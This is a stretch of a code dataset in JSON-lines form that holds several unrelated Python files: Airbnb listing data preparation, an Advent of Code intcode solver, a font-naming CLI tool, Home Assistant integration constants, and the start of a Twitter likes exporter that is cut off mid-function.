the string to the returnString\n returnString += \"This dataset has \" + str(numRows) + \" Rows \" + str(numColumns) + \" Attributes\" + '\\n'+'\\n'\n # Describe function to fetch some summary statistics\n numeric_df = df.describe()\n #Keep only relevant statistics and take transpose\n numeric_df_T = numeric_df.transpose().loc[:, ['mean', '50%', 'std', 'min', 'max']]\n # Rearrangement of columns\n numeric_df_T.columns = ['Mean','Median','Sdev','Min','Max']\n numeric_df_T['Missing'] = 0\n numeric_df_T['Attribute_ID'] = 0\n for i in numeric_df_T.index:\n # Counting number of Missing values\n numeric_df_T.loc[i, 'Missing'] = df[i].isnull().sum()\n # Introducing column to keep track of original Attribute position\n numeric_df_T.loc[i, 'Attribute_ID'] = list(df.columns).index(i) + 1\n numeric_df_T['Attribute_Name'] = numeric_df_T.index\n # Starting index from 1\n numeric_df_T.index = range(1, len(numeric_df_T) + 1)\n # Final re-arrangement of Numeric Attributes\n numeric_df_T = numeric_df_T.loc[:,['Attribute_ID', 'Attribute_Name', 'Missing', 'Mean', 'Median', 'Sdev', 'Min', 'Max']]\n returnString+=\"real valued attributes\"+'\\n' + \"-\"*len(\"real valued attributes\")+'\\n'\n returnString += numeric_df_T.to_string()+'\\n'\n returnString += \"symbolic attributes\" + '\\n' + \"-\" * len(\"symbolic attributes\") + '\\n'\n cols = df.columns\n num_cols = df._get_numeric_data().columns\n # Finding the categorical columns\n cat_cols = list(set(cols) - set(num_cols))\n # Making the initial dataframe with all categorical attributes names and IDs\n sym_df = pd.DataFrame({'Attribute_ID':[list(df.columns).index(i)+1 for i in cat_cols],'Attribute_Name':cat_cols})\n #Initializing values\n sym_df['Missing']=0\n sym_df['arity'] = 0\n sym_df['MCVs_counts'] = \"\"\n #Iterate over all categorical variables and find number of missing and arity and MCV counts\n for i in range(len(cat_cols)):\n #Add Missing value as the second column\n sym_df.iloc[i,2]=df.loc[:,cat_cols[i]].isnull().sum()\n # Drop NA values before arity and MCV counts\n series_without_missing = df.loc[:,cat_cols[i]].dropna()\n # Count frequency of each category\n series_wo_miss_counts = series_without_missing.value_counts()\n # Sort the values\n series_wo_miss_counts.sort_values(inplace=True, ascending=False)\n # Arity count the number of unique values\n sym_df.iloc[i, 3] = len(series_wo_miss_counts)\n # MCV string to iterate over all these values and include their count\n mcv_string = \"\"\n for j in range(min(3,len(series_wo_miss_counts))):\n mcv_string+=str(series_wo_miss_counts.index[j])+\"(\"+str(series_wo_miss_counts[j])+\") \"\n # Add this string as the 4th column in the dataframe\n sym_df.iloc[i, 4] = mcv_string\n sym_df.index = range(1, len(sym_df) + 1)\n #Add the dataframe to the string\n returnString += sym_df.to_string() + '\\n'\n return returnString\n\ndataCompileDir = '/Users/paridhichoudhary/Documents/ADS/Project/dataCompile/'\ndataDir = '/Users/paridhichoudhary/Documents/ADS/Project/data/'\n#\ncompiledCalendarDF = pd.read_csv(dataDir+\"compiledCalendar_Sparse.csv\")\ncompiledListingsDF = pd.read_csv(dataDir+\"CompiledListings_Cleaned.csv\")\n\n\n# print(compiledListingsDF.columns)\n# print(brief(compiledListingsDF))\nstableListingsDF = pd.read_csv(dataCompileDir+\"/Stable_Listings.csv\")\nids = stableListingsDF['ID']\ncompiledListingsDF = compiledListingsDF[compiledListingsDF['id'].isin(ids)]\ncompiledListingsDF['last_scraped'] = compiledListingsDF['last_scraped'].apply(lambda r: r.split('/')[0]+'/'+r.split('/')[1]+'/20'+r.split('/')[2] if len(r.split('/')[2])==2 else r)\n# print(compiledListingsDF.columns)\ncompiledListingsDFToMerge = compiledListingsDF.loc[:,['accommodates', 'amenities','bathrooms', 'bed_type',\n 'bedrooms', 'beds', 'cancellation_policy',\n 'city', 'cleaning_fee', 'extra_people', 'guests_included',\n 'host_is_superhost', 'host_response_rate',\n 'id','instant_bookable', 'is_location_exact','last_scraped',\n 'lastScrapedNumber', 'latitude','longitude', 'market', 'maximum_nights', 'minimum_nights',\n 'neighbourhood_cleansed','number_of_reviews', 'property_type',\n 'require_guest_phone_verification', 'require_guest_profile_picture',\n 'requires_license', 'room_type', 'security_deposit', 'street','zipcode']]\nfinalDF = pd.merge(compiledListingsDFToMerge,compiledCalendarDF,how='left',left_on=['id','lastScrapedNumber'],right_on=['listing_id','lastScrapedNumber'])\nindexes=finalDF[finalDF['Year'].isnull()].index\nfinalDF.loc[indexes,'Year'] = finalDF.loc[indexes,'last_scraped'].apply(lambda r: datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\nfinalDF.loc[indexes,'Month'] = finalDF.loc[indexes,'last_scraped'].apply(lambda r: datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\nfinalDF.loc[indexes,'Day'] = finalDF.loc[indexes,'last_scraped'].apply(lambda r: datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\ncompiledListingsDF['Year'] = compiledListingsDF['last_scraped'].apply(lambda r: datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\ncompiledListingsDF['Month'] = compiledListingsDF['last_scraped'].apply(lambda r: datetime.datetime.strptime(r, \"%d/%m/%Y\").month)\ncompiledListingsDF['Day'] = compiledListingsDF['last_scraped'].apply(lambda r: 1 if datetime.datetime.strptime(r, \"%d/%m/%Y\").weekday()==6 or datetime.datetime.strptime(r, \"%d/%m/%Y\").weekday()==5 else 0 )\ncompiledListingsDFToAppend = compiledListingsDF.loc[:,finalDF.columns]\nfinalDF = finalDF.append(compiledListingsDFToAppend,ignore_index=True)\nfinalDF.drop(labels='listing_id',axis=1,inplace=True)\n# medianDF = finalDF[~finalDF['cleaning_fee'].isnull()].groupby(['property_type','room_type'])['cleaning_fee'].median().reset_index()\nindexes = finalDF[finalDF['cleaning_fee'].isnull()].index\n# cFmissingDF = finalDF.loc[indexes,:]\n# CFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['cleaning_fee_y']\nfinalDF.loc[indexes,'cleaning_fee']= 0\n\n# medianDF = finalDF[~finalDF['security_deposit'].isnull()].groupby(['property_type','room_type'])['security_deposit'].median().reset_index()\nindexes = finalDF[finalDF['security_deposit'].isnull()].index\n# cFmissingDF = finalDF[finalDF['security_deposit'].isnull()]\n# CFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['security_deposit_y']\nfinalDF.loc[indexes,'security_deposit'] = 0\n\nmedianDF = finalDF[~finalDF['bathrooms'].isnull()].groupby(['property_type','room_type'])['bathrooms'].median().reset_index()\nindexes = finalDF[finalDF['bathrooms'].isnull()].index\ncFmissingDF = finalDF[finalDF['bathrooms'].isnull()]\nCFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['bathrooms_y']\nfinalDF.loc[indexes,'bathrooms'] = CFreplaceDF\n\nmedianDF = finalDF[~finalDF['bedrooms'].isnull()].groupby(['property_type','room_type'])['bedrooms'].median().reset_index()\nindexes = finalDF[finalDF['bedrooms'].isnull()].index\ncFmissingDF = finalDF[finalDF['bedrooms'].isnull()]\nCFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['bedrooms_y']\nfinalDF.loc[indexes,'bedrooms'] = CFreplaceDF\n\nmedianDF = finalDF[~finalDF['beds'].isnull()].groupby(['property_type','room_type'])['beds'].median().reset_index()\nindexes = finalDF[finalDF['beds'].isnull()].index\ncFmissingDF = finalDF[finalDF['beds'].isnull()]\nCFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['beds_y']\nfinalDF.loc[indexes,'beds'] = CFreplaceDF\nfinalDF = finalDF.dropna()\nfinalDF.to_csv(dataDir+\"CalendarListingsCombined_Sparse.csv\",index=False)","repo_name":"paridhichoudhary/Airbnb-Price-Predictor","sub_path":"dayWiseRegressionDataPreparation.py","file_name":"dayWiseRegressionDataPreparation.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11069811606","text":"import time\nimport itertools\nfrom collections import defaultdict\n\nCURR_MS = lambda: time.time() * 1000\n\nprint('+-------------------------+')\nprint('| ADVENT OF CODE - DAY XX |')\nprint('+-------------------------+')\n\nSTART_READ = CURR_MS()\nprint('\\nREADING FILE... ',end='')\nwith open(\"input.txt\") as file:\n inputs = file.read().strip().split(',')\nprint('%.6fms\\n' % (CURR_MS() - START_READ))\n\ndef run_intcode(code, prog_inputs):\n # OPCODES 1 2 3 4 5 6 7 8\n arg_sizes = defaultdict(lambda:0, dict(enumerate([0, 3, 3, 1, 1, 2, 2, 3, 3])))\n\n def get_arg(arg, instr_pt, write):\n return code[instr_pt+arg] if write \\\n else (code[code[instr_pt+arg]] if int(instr[-(2+arg)]) == 0 else code[instr_pt+arg])\n\n code = list(map(int, code))\n prog_inputs = list(prog_inputs)\n outputs = []\n instr_pt = 0\n\n while True:\n jump = False\n instr = str(code[instr_pt])\n opcode = int(instr[-2:])\n argsize = arg_sizes[opcode]\n instr = instr.zfill(argsize + 2)\n\n if opcode == 99: return outputs # HALT\n elif opcode == 1: # ADD\n arg1 = get_arg(1, instr_pt, False)\n arg2 = get_arg(2, instr_pt, False)\n arg3 = get_arg(3, instr_pt, True)\n code[arg3] = arg1 + arg2\n elif opcode == 2: # MULTIPLY\n arg1 = get_arg(1, instr_pt, False)\n arg2 = get_arg(2, instr_pt, False)\n arg3 = get_arg(3, instr_pt, True)\n code[arg3] = arg1 * arg2\n elif opcode == 3: # INPUT\n arg1 = get_arg(1, instr_pt, True)\n in_command = prog_inputs.pop(0)\n code[arg1] = in_command\n elif opcode == 4: # OUTPUT\n arg1 = get_arg(1, instr_pt, False)\n outputs.append(arg1)\n elif opcode == 5: # JUMP IF TRUE\n arg1 = get_arg(1, instr_pt, False)\n arg2 = get_arg(2, instr_pt, False)\n if arg1 != 0:\n instr_pt = arg2\n jump = True\n elif opcode == 6: # JUMP IF FALSE\n arg1 = get_arg(1, instr_pt, False)\n arg2 = get_arg(2, instr_pt, False)\n if arg1 == 0:\n instr_pt = arg2\n jump = True\n elif opcode == 7: # LESS THAN\n arg1 = get_arg(1, instr_pt, False)\n arg2 = get_arg(2, instr_pt, False)\n arg3 = get_arg(3, instr_pt, True)\n code[arg3] = 1 if arg1 < arg2 else 0\n elif opcode == 8: # EQUALS\n arg1 = get_arg(1, instr_pt, False)\n arg2 = get_arg(2, instr_pt, False)\n arg3 = get_arg(3, instr_pt, True)\n code[arg3] = 1 if arg1 == arg2 else 0\n if not jump: instr_pt = instr_pt + (argsize + 1)\n\ndef part_one():\n max_thruster_sig = 0\n phases = list(itertools.permutations(range(5)))\n\n for phase in phases:\n thruster_sig = \\\n run_intcode(inputs, [phase[4], \\\n run_intcode(inputs, [phase[3], \\\n run_intcode(inputs, [phase[2], \\\n run_intcode(inputs, [phase[1], \\\n run_intcode(inputs, [phase[0], \\\n 0])[0]])[0]])[0]])[0]])[0]\n max_thruster_sig = max(thruster_sig, max_thruster_sig);\n return max_thruster_sig\n\ndef part_two():\n max_thruster_sig = 0\n phases = list(itertools.permutations(range(5,10)))\n print(phases)\n\n for phase in phases:\n first_loop = True\n amp_outs = [None]*5\n # TODO: intcode probably needs to be rewritten, maybe use [yield]?\n\n return max_thruster_sig\n\nSTART_ONE = CURR_MS()\nprint('PART ONE: ' + str(part_one()))\nprint('TIME TAKEN... %.6fms\\n' % (CURR_MS() - START_ONE))\n\nSTART_TWO = CURR_MS()\nprint('PART TWO: ' + str(part_two()))\nprint('TIME TAKEN... %.6fms\\n' % (CURR_MS() - START_TWO))\n","repo_name":"andrewfhou/advent-of-code-2019","sub_path":"day07/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30924462338","text":"import os\nimport sys\n\nimport click\nfrom fontTools.ttLib import TTFont\nfrom ftcli.Lib.configHandler import configHandler\nfrom ftcli.Lib.csvHandler import csvHandler\nfrom ftcli.Lib.pyFont import pyFont\nfrom ftcli.Lib.GUI import GUI\nfrom ftcli.Lib.utils import (getConfigPath, getCsvPath, getFontsList,\n makeOutputFileName)\n\n\n# edit-csv\n@click.group()\ndef editCSV():\n pass\n\n\n@editCSV.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\ndef edit_csv(input_path, config_file):\n \"\"\"\n Command line editor for 'data.csv' files.\n\n This tool is not intended to replace a code editor for CSV files,\n but can help to make small edits without leaving the command line.\n For complex projects, it's strongly recommendedto use a code\n editor like Visual Studio Code or even Excel.\n \"\"\"\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n\n csv_file = getCsvPath(input_path)\n if not os.path.exists(csv_file):\n confirm = click.confirm(\n \"\\n%s doesn't exist. Do you want to create it\" % csv_file, default=True)\n if confirm:\n csvHandler(csv_file).resetCSV(config_file=config_file)\n else:\n return\n\n GUI().csvEditor(config_file=config_file, csv_file=csv_file)\n\n\n# edit-cfg\n@click.group()\ndef editCFG():\n pass\n\n\n@editCFG.command()\n@click.argument('config_file', type=click.Path(exists=True, dir_okay=False, resolve_path=True))\ndef edit_cfg(config_file):\n \"\"\"\nCommand line editor for JSON configuration files.\n\nExample:\n\n ftcli wizard edit-cfg \"C:\\\\Fonts\\\\config.json\"\n\nIt is strongly recommended to use this tool to edit the JSON configuration\nfiles. It prevents malformed JSON errors and errors due to wrong values (for\nexample, an out of range usWeightClass, or a string where's an integer is\nexpected).\n \"\"\"\n\n GUI().cfgEditor(config_file)\n\n\n# init-csv\n@click.group()\ndef initCSV():\n pass\n\n\n@initCSV.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\n@click.option('-q', '--quiet', is_flag=True,\n help='Suppress the overwrite confirmation message if the data.csv and/or config.json files already exist.')\ndef init_csv(input_path, config_file, quiet):\n \"\"\"\nCreates or resets the CSV database file (data.csv).\n\nExample 1:\n\n ftcli wizard init-csv \"C:\\\\Fonts\\\\\"\n\nThe above command will create the 'data.csv' file in C:\\\\Fonts\\\\\n(and a configuration file with default values if it does not exist).\n\nExample 2:\n\n ftcli wizard init-csv \"C:\\\\Fonts\\\\Font.otf\"\n\nThe above command will create the 'data.csv' in the INPUT_PATH folder\n(or parent folder, if INPUT_PATH is a file).\n\ndata.csv file contains:\n\n- the file names;\n\n- the usWidthClass, usWeightClass, bold and italic bits values of all\nfont files found in INPUT_PATH;\n\n- tries to guess the family name reading the name table. It also\ncontains weight and widths literals, retrieved parsing the config.json\nfile.\n\nIt can be edited manually or using the 'ftcli wizard edit-csv INPUT_PATH'\ncommand.\n \"\"\"\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n if not os.path.exists(config_file) or quiet:\n configHandler(config_file).resetConfig()\n click.secho('\\n{} didn\\'t exist and has been created'.format(\n config_file), fg='green')\n\n csv_file = getCsvPath(input_path)\n if not os.path.exists(csv_file) or quiet:\n confirm_overwrite = True\n else:\n confirm_overwrite = click.confirm(\n '{} already exists. Do you want to overwrite it?'.format(csv_file))\n\n if confirm_overwrite:\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n csvHandler(csv_file).resetCSV(config_file=config_file)\n click.secho('{} created'.format(csv_file), fg='green')\n\n\n# init-cfg\n@click.group()\ndef initCFG():\n pass\n\n\n@initCFG.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True, file_okay=False))\n@click.option('-q', '--quiet', is_flag=True,\n help='Suppress the overwrite confirmation message if the config.json file already exists.')\ndef init_cfg(input_path, quiet):\n \"\"\"\n Creates a JSON configuration file containing the default values in the specified INPUT_PATH folder.\n \"\"\"\n config_file = getConfigPath(input_path)\n\n if not os.path.exists(config_file) or quiet:\n confirm_overwrite = True\n else:\n confirm_overwrite = click.confirm(\n '\\n{} already exists. Do you want to overwrite it?'.format(config_file))\n if confirm_overwrite:\n configHandler(config_file).resetConfig()\n click.secho('{} created'.format(config_file), fg='green')\n\n\n# recalc-csv\n@click.group()\ndef recalcCSV():\n pass\n\n\n@recalcCSV.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\n@click.option('-f', '--family-name', default=None,\n help=\"The desired family name. This string will be used to recalculate the CSV lines.\")\n@click.option('-s', '--source-string', type=click.Choice(\n choices=('fname', '1_1_2', '1_4', '1_6', '1_16_17', '1_18', '3_1_2', '3_4', '3_6', '3_16_17', 'cff_1', 'cff_2', 'cff_3')),\n default='fname', show_choices=True, show_default=True,\n help=\"\"\"\nThe source string be used to recalculate the CSV lines can be the file name, a namerecord, a combination of namerecords or values sotred in the 'CFF' table.\n\nFor example, -s '1_1_2' will read a combination of namerecords 1 and 2 in the Mac table.\n\"\"\")\n@click.option('-q', '--quiet', is_flag=True,\n help='Suppress the overwrite confirmation message if the data.csv file already exists.')\ndef recalc_csv(input_path, config_file, family_name, source_string, quiet):\n \"\"\"\nRecalculates the CSV database file (data.csv).\n \"\"\"\n csv_file = getCsvPath(input_path)\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n # If config.json doesn't exist, it has to be created before.\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n click.secho('\\n{} didn\\'t exist and has been created'.format(\n config_file), fg='yellow')\n\n if os.path.exists(csv_file) and not quiet:\n confirmation = click.confirm(\n '\\n{} already exists. Do you want to overwrite it?'.format(csv_file))\n if confirmation is True:\n csvHandler(csv_file).recalcCSV(\n config_file=config_file, family_name=family_name, source_string=source_string)\n click.secho('\\n{} created'.format(csv_file), fg='green')\n else:\n # Let's ensure that, if the data.csv file doesn't exist,\n # it is created before recalculation.\n if not os.path.exists(csv_file):\n csvHandler(csv_file).resetCSV(config_file=config_file)\n\n csvHandler(csv_file).recalcCSV(\n config_file=config_file, family_name=family_name, source_string=source_string)\n click.secho('\\n{} created'.format(csv_file), fg='green')\n\n\n# recalc-names\n@click.group()\ndef recalcNames():\n pass\n\n\n@recalcNames.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\n@click.option('-ls', '--linked-styles', type=(click.IntRange(1, 1000), click.IntRange(1, 1000)), default=(None, None),\n help=\"Use this option to activate linked styles. If this option is active, linked styles must be specified. For example: -ls 400 700, or -ls 300 600.\")\n@click.option('-ex', '--exclude-namerecords', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs to skip. The specified name IDs won't be recalculated. This option can be repeated (example: -ex 3 -ex 5 -ex 6...).\")\n@click.option('-swdt', '--shorten-width', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs where to use the short word for width style name (example: 'Cond' instead of 'Condensed'). This option can be repeated (example: -swdt 3 -swdt 5 -swdt 6...).\")\n@click.option('-swgt', '--shorten-weight', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs where to use the short word for weight style name (example: 'Md' instead of 'Medium'). This option can be repeated (example: -swgt 3 -swgt 5 -swgt 6...).\")\n@click.option('-sita', '--shorten-italic', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs where to use the short word for italic style name (example: 'It' instead of 'Italic'). This option can be repeated (example: -sita 3 -sita 5 -sita 6...).\")\n@click.option('-sf', '--super-family', is_flag=True,\n help=\"Superfamily mode. This option affects name IDs 3, 6, 16 and 17 in case of families with widths different than 'Normal'. If this option is active, name ID 6 will be 'FamilyName-WidthWeightSlope' instead of 'FamilyNameWidth-WeightSlope'. Mac and OT family/subfamily names will be Family Name / Width Weight Slope' instead of 'Family Name Width / Weight Slope'.\")\n@click.option('-aui', '--alt-uid', is_flag=True,\n help=\"Use alternate unique identifier. By default, namerecord 3 (Unique identifier) is calculated according to the following scheme: 'Version;Vendor code;PostscriptName'. The alternate unique identifier is calculated according to the following scheme: 'Manufacturer: Full Font Name: creation year'\")\n@click.option('-ri', '--regular-italic', is_flag=True,\n help=\"Use '-RegularItalic' instead of '-Italic' in name ID 6.\")\n@click.option('-kr', '--keep-regular', is_flag=True,\n help=\"Use '-RegularItalic' instead of '-Italic' in name ID 6 and 'Regular Italic' instead of 'Italic' in name IDs 2 (Mac only), 4, 17 and 18.\")\n@click.option('-offn', '--old-full-font-name', is_flag=True,\n help=\"Full font name in Microsoft name table is generally a combination of name IDs 1 and 2 or 16 and 17. With this option active, it will be equal to name ID 6 (PostScriptName).\")\n@click.option('-cff', '--fix-cff', is_flag=True,\n help=\"fontNames, FullName, FamilyName and Weight values in the 'CFF' table will be recalculated.\")\n@click.option('-o', '--output-dir', type=click.Path(file_okay=False, resolve_path=True), default=None,\n help='Specify the output directory where the output files are to be saved. If output_directory doesn\\'t exist, will be created. If not specified, files are saved to the same folder.')\n@click.option('--recalc-timestamp/--no-recalc-timestamp', default=False, show_default=True,\n help='Keep the original font \\'modified\\' timestamp (head.modified) or set it to current time. By default, original timestamp is kept.')\n@click.option('--overwrite/--no-overwrite', default=True, show_default=True,\n help='Overwrite existing output files or save them to a new file (numbers are appended at the end of file name). By default, files are overwritten.')\ndef recalc_names(\n input_path,\n config_file,\n linked_styles,\n exclude_namerecords,\n shorten_width,\n shorten_weight,\n shorten_italic,\n fix_cff,\n super_family,\n alt_uid,\n regular_italic,\n keep_regular,\n old_full_font_name,\n output_dir,\n recalc_timestamp,\n overwrite\n):\n \"\"\"\n Recalculates namerecords according to the values stored in the data.csv file.\n \"\"\"\n\n files = getFontsList(input_path)\n if len(files) == 0:\n click.secho('\\nNo fonts found.', fg='red')\n sys.exit()\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n # If config.json doesn't exist, it has to be created before.\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n click.secho('\\n{} didn\\'t exist and has been created'.format(\n config_file), fg='yellow')\n\n config = configHandler(config_file).getConfig()\n\n italics = config['italics']\n italics.sort(key=len)\n\n csv_file = getCsvPath(input_path)\n if not os.path.exists(csv_file):\n csvHandler(csv_file).resetCSV(config_file=config_file)\n data = csvHandler(csv_file).getData()\n\n # Checks if the file name is present in the CSV data. If the file name\n # is not present, the file is removed from the list of files and will\n # not be processed.\n csv_filenames = [row['file_name'] for row in data]\n files = [f for f in files if os.path.basename(f) in csv_filenames]\n\n shorten_width = [int(i) for i in shorten_width]\n shorten_weight = [int(i) for i in shorten_weight]\n shorten_italic = [int(i) for i in shorten_italic]\n exclude_namerecords = [int(i) for i in exclude_namerecords]\n\n # We convert the linked_styles tuple to a list and then sort it.\n linked_styles = tuple(set(linked_styles))\n linked_styles = list(linked_styles)\n linked_styles.sort()\n\n for f in files:\n try:\n font = TTFont(f, recalcTimestamp=recalc_timestamp)\n font_data = {}\n for row in data:\n if str(row['file_name']) == os.path.basename(f):\n font_data = row\n\n pyFont(font).recalcNames(\n font_data, italics,\n linked_styles=linked_styles, namerecords_to_ignore=exclude_namerecords,\n shorten_weight=shorten_weight, shorten_width=shorten_width, shorten_italic=shorten_italic,\n alt_uid=alt_uid, fixCFF=fix_cff, isSuperFamily=super_family, regular_italic=regular_italic, keep_regular=keep_regular, old_full_font_name=old_full_font_name)\n\n output_file = makeOutputFileName(\n f, outputDir=output_dir, overWrite=overwrite)\n font.save(output_file)\n click.secho('{} saved'.format(output_file), fg='green')\n except:\n click.secho('{} is not a valid font'.format(f), fg='red')\n pass\n\n\ncli = click.CommandCollection(sources=[editCFG, editCSV, initCFG, initCSV, recalcCSV, recalcNames], help=\"\"\"\nA set of tools to correctly compile the name table and set proper values\nfor usWeightClass, usWidthClass, bold and italic bits.\n\nThe process requires a JSON configuration file and a CSV file that will be\nused to fix the fonts. Both files can be automatically created and\neventually edited manually or using the integrated command line editor.\n\n1) The JSON configuration file.\n\nThe 'config.json' file contains the desired style names to pair with each\nusWidthClass and usWeightClass values of the family, as well as the italic\nliterals:\n\n\\b\n{\n \"italics\": [\"It\", \"Italic\"],\n\\b\n \"weights\": {\n \"250\": [\"Th\", \"Thin\"],\n \"275\": [\"ExLt\", \"ExtraLight\"],\n ...\n },\n\\b\n \"widths\": {\n \"1\": [\"Cm\", \"Compressed\"],\n \"2\": [\"ExCn\", \"ExtraCondensed\"],\n ...\n }\n}\n\nUnless you have previously created a configuration file and want to reuse\nit, you need to create a standard configuration file and eventually\ncustomize it.\n\n ftcli wizard init-cfg INPUT_PATH\n\nThe above command will create a file named 'config.json' in the INPUT_PATH\nfolder (or parent folder if INPUT_PATH is a file).\n\nOnce created the configuration file, you may be in need to edit it according\nto your needs.\n\n ftcli wizard edit-cfg CONFIG_FILE\n\nValues contained in the configuration file will be used to fill the data.csv\nfile in the next steps.\n\n2) The CSV data file.\n\nThe final data.csv file will contain the desired style names, family name,\nitalic bits, usWidth class and usWeightClass values. Once properly filled,\nthe values contained in this file will be written to the fonts.\n\nIt contains 10 columns:\n\n\\b\nfile_name\nis_bold \nis_italic\nuswidthclass\nwdt\nwidth\nusweightclass\nwgt\nweight\nfamily_name\n\nThe 'is_bold' column is present only for completeness, but it's values will be\nignored. A font will be set as bold only and only if, during the names recalculation,\nthe user will choose to use linked styles (-ls / --linked styles option).\n\nThe 'wdt' and 'width' columns contain the short and long literals for the width\nstyle names (for example: Cn; Condensed).\n\nThe 'wgt' and 'weight' columns contain the short and long literals for the weight\nstyle names (for example: Lt, Light).\n\nThe user will choose the namerecords where to write long or short literals.\n\nThe 'data.csv' file can be created using the following command:\n\n ftcli wizard init-csv INPUT_PATH\n\nAt this point, the CSV file will contain a representation of the actual state of the\nfonts (the family_name column will contain values of nameID 16, or nameID 1 if 16 is\nnot present). It can be edited manually, using the 'ftcli wizard edit-csv' command and\nalso automatically recalculated using the 'ftcli wizard-recalc-csv' command.\n\nThe 'ftcli wizard-recalc-csv' command will recalculate style names, italic bits, width\nand weight style names according to the values contained in the JSON configuration file.\n\nWhen the 'data.csv' file contains the desired values, these values can be applied to fonts\nrunning the 'ftcli wizard recalc-names' command (see 'ftcli wizard recalc-names --help' for\nmore informations).\n\n \"\"\")\n","repo_name":"alerque/ftCLI","sub_path":"ftcli/commands/ftcli_wizard.py","file_name":"ftcli_wizard.py","file_ext":"py","file_size_in_byte":18181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"34764157516","text":"\"\"\"Constants for the Vconnex integration.\"\"\"\n\nfrom __future__ import annotations\n\nfrom homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN\nfrom homeassistant.components.cover import DOMAIN as COVER_DOMAIN\nfrom homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN\nfrom homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN\n\nDOMAIN = \"vconnex_cc\"\nDOMAIN_NAME = \"Vconnex CC\"\nPROJECT_CODE = \"HASS\"\n\nPLATFORMS = [\n SWITCH_DOMAIN,\n SENSOR_DOMAIN,\n BINARY_SENSOR_DOMAIN,\n COVER_DOMAIN,\n]\n\nDEFAULT_ENDPOINT = \"https://hass-api.vconnex.vn\"\n\nCONF_CLIENT_ID = \"client_id\"\nCONF_CLIENT_SECRET = \"client_secret\"\nCONF_USER_ID = \"user_id\"\nCONF_PROJECT_NAME = \"project_name\"\nCONF_USER_NAME = \"user_name\"\nCONF_PASSWORD = \"password\"\nCONF_ENDPOINT = \"endpoint\"\nCONF_COUNTRY = \"country\"\n\n\nclass DispatcherSignal:\n \"\"\"DispatcherSignal.\"\"\"\n\n DEVICE_ADDED = f\"{DOMAIN}.device_added\"\n DEVICE_UPDATED = f\"{DOMAIN}.device_updated\"\n DEVICE_REMOVED = f\"{DOMAIN}.device_removed\"\n\n\nclass CommandName:\n \"\"\"Device command name.\"\"\"\n\n SET_DATA = \"CmdSetData\"\n GET_DATA = \"CmdGetData\"\n\n\nclass ParamType:\n \"\"\"Device Param Type.\"\"\"\n\n NONE = 0\n ON_OFF = 1\n OPEN_CLOSE = 2\n YES_NO = 3\n ALERT = 4\n MOVE_NOMOVE = 5\n RAW_VALUE = 6\n\n\nPARAM_TYPES = [\n ParamType.NONE,\n ParamType.ON_OFF,\n ParamType.OPEN_CLOSE,\n ParamType.YES_NO,\n ParamType.ALERT,\n ParamType.MOVE_NOMOVE,\n ParamType.RAW_VALUE,\n]\n","repo_name":"vconnex/vconnex-home-assistant","sub_path":"custom_components/vconnex_cc/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3173007400","text":"import tweepy\nimport csv\n\n# Replace these with your own Twitter API keys and access tokens\nconsumer_key = 'your_consumer_key'\nconsumer_secret = 'your_consumer_secret'\naccess_token = 'your_access_token'\naccess_token_secret = 'your_access_token_secret'\n\n# Authenticate with the Twitter API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\n\ndef get_all_likes(api):\n likes = []\n for status in tweepy.Cursor(api.favorites).items():\n tweet = {\n 'id': status.id_str,\n 'created_at': status.created_at,\n 'text': status.text,\n 'user': status.user.screen_name,\n }\n likes.append(tweet)\n return likes\n\n\ndef 